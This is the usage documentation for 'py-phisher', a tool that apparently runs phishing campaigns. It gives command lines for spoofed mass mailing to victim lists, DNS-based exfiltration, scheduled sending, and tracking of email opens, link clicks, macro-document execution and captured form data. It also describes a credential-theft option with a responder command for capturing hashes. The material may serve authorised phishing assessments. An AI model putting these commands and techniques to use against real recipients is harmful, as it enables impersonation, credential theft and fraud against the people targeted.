A basic script for sending mass mail with exfiltration via DNS.
This script requires a local bind server (dns). This script reads bind logs.
Do not forget to configure your domain as following:
dig -t ANY xxx.fr
xxx.fr. 3599 IN TXT "v=spf1 mx a ip4:666.666.666.666/32 a:mail.xxx.fr ~all"
xxx.fr. 3599 IN SOA xxx.fr. postmaster.xxx.fr. 10 3600 3600 2419200 3600
xxx.fr. 3599 IN NS ns.xxx.fr.
xxx.fr. 3599 IN A 666.666.666.666
xxx.fr. 3599 IN MX 10 mail.xxx.fr.
Command lines arguments
################################################################################
Example of usage:
Mode interactive
./py-phisher.py
Interact with previous campaign:
./py-phisher.py --campaignId=XXXXX
Manual sending a campagne to ONE victim (3th1c41@1mm0r41.local) and send report to 3th1c41@1mm0r41.local usurpate evil-mailer@evildomain.fr
./py-phisher.py --csvUsers=3th1c41@1mm0r41.local --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€"
Manual sending a campagne to a list victim and send report to 3th1c41@1mm0r41.local usurpate evil-mailer@evildomain.fr
./py-phisher.py --csvUsers=victim.csv --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€"
Create task for sending the campagne at 2018-12-31_08:30 to ONE victime (3th1c41@1mm0r41.local) and send report to 3th1c41@1mm0r41.local usurpate evil-mailer@evildomain.fr
./py-phisher.py --csvUsers=3th1c41@1mm0r41.local --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€" --sendAt=2018-12-31_08:30
--csvUsers=<email>,<email>,... or <file.csv>
# Desc: Victim or Victim list
#
# Format for <file.csv>
# email; lastname; firstname; group1; group2; group3
--logToEmail=<email>
# Desc: Send report to <email> at every 17h00 every day
--from=<email>
# Desc: Phisher email
# Default: evil-mailer@evildomain.fr
--from-name=<string>
# Desc: Phisher Name
# Default: None
# Ex: for adding spaces use quot "--from-name=1mm0r41"
--eml=<file> or <None>
# Desc: Email template to use. If omited, interactiv session with an IMAP server to select a template in the "Sent" folder.
--getStats
# Desc: Get stats for a campaign. Require --campaignId
--campaignId=<id>
# Desc: Use this arg if you what to interact with a Campaign.
# Note: Campaign ID generated by Py-Phisher
--sendAt=<Date> or <None>
# Desc: Make a crontab for sending the phishing session. If omited, direct sending the phishing session.
# Format: %Y-%m-%d_%H:%M
--www=<Folder> or <None>
# Desc: The http folder for links
--client=<client name> or <None>
# Desc: The name client. Will be used in the report.
--getLastTemplate
# Desc: Get the last template from office and use it
--removeAllCron
# Desc: Remove all old py-phisher CRON
--credentialsTheft
# Desc: Insert malicious payload to theft user's credentials on mail open.
Run responder on a dedicated server with the following command:
root@kali:# responder -I eth0 --lm -v -b
And do not forget to add in the DNS config:
*.responder.<domain>.fr. IN A <ip-responder>
--debugEml
# Desc: If enabled, will save all mail to /tmp/<email>.<campaignId>
################################################################################
EML
The following fields can be used in the email and in filename:
${DOMAIN} - Main Domain for DNS tunnel
${FROM_MAIL} - Email FROM
${FROM_NAME} - Email FROM NAME
${DEST_MAIL} - Email destination
${DEST_NAME} - Name of the destination
${CAMPAIGN_ID} - ID of the campaign
${USER_ID} - User ID
${TRACKER_LINK} - HTTP link to the form ex: http://poney.com/piolosputkpuoipyputlyr == http://poney.com/${TRACKER_ID}
${TRACKER_ID} - User tracker for campaign.
${TRACKER_IMG} - HTML Picture to detect if the email has been opened
${STATS_OPEN}...${/STATS_OPEN} - If the user has allready OPENED the email, the html between these tags in the email will be showed. If the user hasn't opened the email, this tag will be removed.
${!STATS_OPEN}...${/!STATS_OPEN} - If the user hasn't OPENED the email, the html between these tags in the email will be showed. If the user hasn opened the email, this tag will be removed.
${STATS_OPEN__DATA} - If the user has allready OPENED the email, this tag will be replaced by the date when the mail has been opened.
${STATS_VBA}...${/STATS_VBA} - If the user has allready OPENED the email and executed the DOCM, the html between these tags in the email will be showed. If the user hasn't executed the DOCM, this tag will be removed.
${!STATS_VBA}...${/!STATS_VBA} - If the user has OPENED the email and NOT executed the DOCM, the html between these tags in the email will be showed. If the user has executed the DOCM, this tag will be removed.
${STATS_VBA__DATA} - If the user has allready OPENED the email and executed the DOCM, this tag will be replaced by the date when the DOCM has been opened.
${STATS_LINK}...${/STATS_LINK} - If the user has allready OPENED the email and clicked on the HTTP link, the html between these tags in the email will be showed. If the user hasn't clicked on the HTTP link, this tag will be removed.
${!STATS_LINK}...${/!STATS_LINK} - If the user has OPENED the email and NOT clicked on the HTTP link, the html between these tags in the email will be showed. If the user has clicked on the HTTP link, this tag will be removed.
${STATS_VBA__LINK} - If the user has allready OPENED the email and clicked on the HTTP link, this tag will be replaced by the date when the HTTP link has been clicked.
${STATS_FORM}...${/STATS_FORM} - If the user has allready OPENED the email and the form of the website filled, the html between these tags in the email will be showed. If the user hasn't filled the form, this tag will be removed.
${!STATS_FORM}...${/!STATS_FORM} - If the user has OPENED the email and the form of the website NOT filled, the html between these tags in the email will be showed. If the user has filled the form, this tag will be removed.
${STATS_FORM__DATA} - If the user has allready OPENED the email and the form of the website filled, this tag will be replaced by the DATA of the FORM.
${STATS_VICTIM_SAFE}...GG you havn't been powned ...${STATS_VICTIM_SAFE} - If the user hasn't opened the malicious email this content will be shown.
${!STATS_VICTIM_SAFE}...FAIL you have been powned ...${!STATS_VICTIM_SAFE} - If the user HAS opened the malicious email this content will be shown.